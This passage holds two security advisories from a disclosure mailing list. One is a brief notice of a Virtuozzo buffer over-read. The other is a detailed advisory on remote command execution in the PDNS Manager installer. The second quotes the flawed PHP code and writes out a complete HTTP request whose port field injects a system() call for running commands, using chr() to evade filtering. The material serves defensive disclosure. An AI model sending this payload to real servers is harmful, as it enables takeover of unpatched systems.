[FD] Buffer over-read vulnerability in Virtuozzo Power Panel (VZPP) and Automator

[Securify B.V. via Fulldisclosure]

Buffer over-read vulnerability in Virtuozzo Power Panel (VZPP) and
Automator

Sipke Mellema, July 2017


Abstract

Virtuozzo Power Panel is a solution that allows customers of service
providers to manage their virtual environments. Virtuozzo Automator is
an administrative tool for managing the service provider's virtual
infrastructure. Both products are affected by a buffer over-read
vulnerability that allows attackers to read random server memory.


Tested versions

This issue was tested on Virtuozzo Power Panel version 6.1.2.


Fix

A fix for this issue is included in the following software versions:
- Virtuozzo Power Panel 6.1.2-hotfix5
- Virtuozzo Automator 6.1.2-hotfix5 and 7.0.2-hotfix1


Details

https://www.securify.nl/advisory/SFY20170701/buffer-over-read-vulnerability-in-virtuozzo-power-panel-_vzpp_-and-automator.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2017-011] Remote Command Execution in PDNS Manager

[RedTeam Pentesting GmbH]

Advisory: Remote Command Execution in PDNS Manager

RedTeam Pentesting discovered that PDNS Manager is vulnerable to a
remote command execution vulnerability, if for any reason the
configuration file config/config-user.php does not exist.


Details
===

Product: PDNS Manager
Affected Versions: Git master 3bf4e28 (2016-12-12) - 2bb00ea (2017-05-22)
Fixed Versions: <= v1.2.1, >= Git Commit ccc4232
Vulnerability Type: Remote Command Execution
Security Risk: medium 
Vendor URL: https://pdnsmanager.lmitsystems.de/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-011
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"PDNS Manager is a simple yet powerful administration tool for the
Powerdns authoritative nameserver."
"PNDS Manager was developed from scratch to achieve a user-friendly and
pretty looking interface."
(from project website) [0]


More Details


PDNS Manager includes two files used for installation purposes,
install.php and api/install.php. The documentation tells users to start
the installation by navigating to install.php and filling out the form that is
presented there to create a database connection and an admin account. When
submitted, an HTTP POST request with the configuration data is sent to
api/install.php. The data is first validated in api/install.php by using it to
connect to the database:


try {
$db = new 
PDO("$input->type:dbname=$input->database;host=$input->host;port=$input->port", 
$input->user, $input->password);
}
catch (PDOException $e) {
$retval['status'] = "error";
$retval['message'] = serialize($e);
}


As long as a valid database connection can be made with the data from
the POST request, the installation process continues. The configuration is
written to the file config/config-user.php which then gets included from
config/config-default.php:


$configFile = Array();

$configFile[] = 'host)."';";
$configFile[] = '$config[\'db_user\']=\''.addslashes($input->user)."';";
$configFile[] = '$config[\'db_password\']= 
\''.addslashes($input->password)."';";
$configFile[] = '$config[\'db_name\']=\''.addslashes($input->database)."';";
$configFile[] = '$config[\'db_port\']='.addslashes($input->port).";";
$configFile[] = '$config[\'db_type\']=\''.addslashes($input->type)."';";

$retval['status'] = "success";
try {
file_put_contents("../config/config-user.php", implode("\n", $configFile));
}


At the very beginning of install.php, it is checked whether the file
config/config-user.php already exists. If this is the case, further
execution of the installation process is aborted:


if(file_exists("../config/config-user.php")) {
echo "Permission denied!";
exit();
}


However, the installation files are not removed and can therefore still
be accessed. In consequence, attackers can (re-)run the installation
process as long as the file config/config-user.php does not exist. This
can be the case if either the installation routine was indeed not yet
run, or the configuration details were added manually, e.g. by entering
them directly into the file config/config-default.php.

The provided configuration data is not verified for semantic or
syntactic correctness in any way. Only the PHP function addslashes() is
used for all inputs, to mask single quotes, double quotes and
backslashes. While this prevents adding malicious input to the
configuration values which are set in single quotes, the port, which is
expected to be numeric, is not enclosed in single quotes, making it
vulnerable to code injection. Therefore, an HTTP POST request with a
manipulated port value like the following could be sent to the
installer:


POST /api/install.php HTTP/1.1
Host: example.com
[...]
Connection: close

{
"host":"attacker-system.example.com",
"user":"root",
"password":"secret",
"database":"pdnsdb",
"port":"3306;system($_GET[chr(99).chr(109).chr(100)])",
"userName":"administrator",
"userPassword":"password",
"type":"mysql"
}


To bypass the problem that the addslashes() function prevents the usage
of single or double quotes for the GET variable name, it was instead
encoded with the chr() function and decodes to the string "cmd".

PDNS Manager since Git commit 3bf4e28[1] from 12 December 2016 uses the
PHP PDO class fo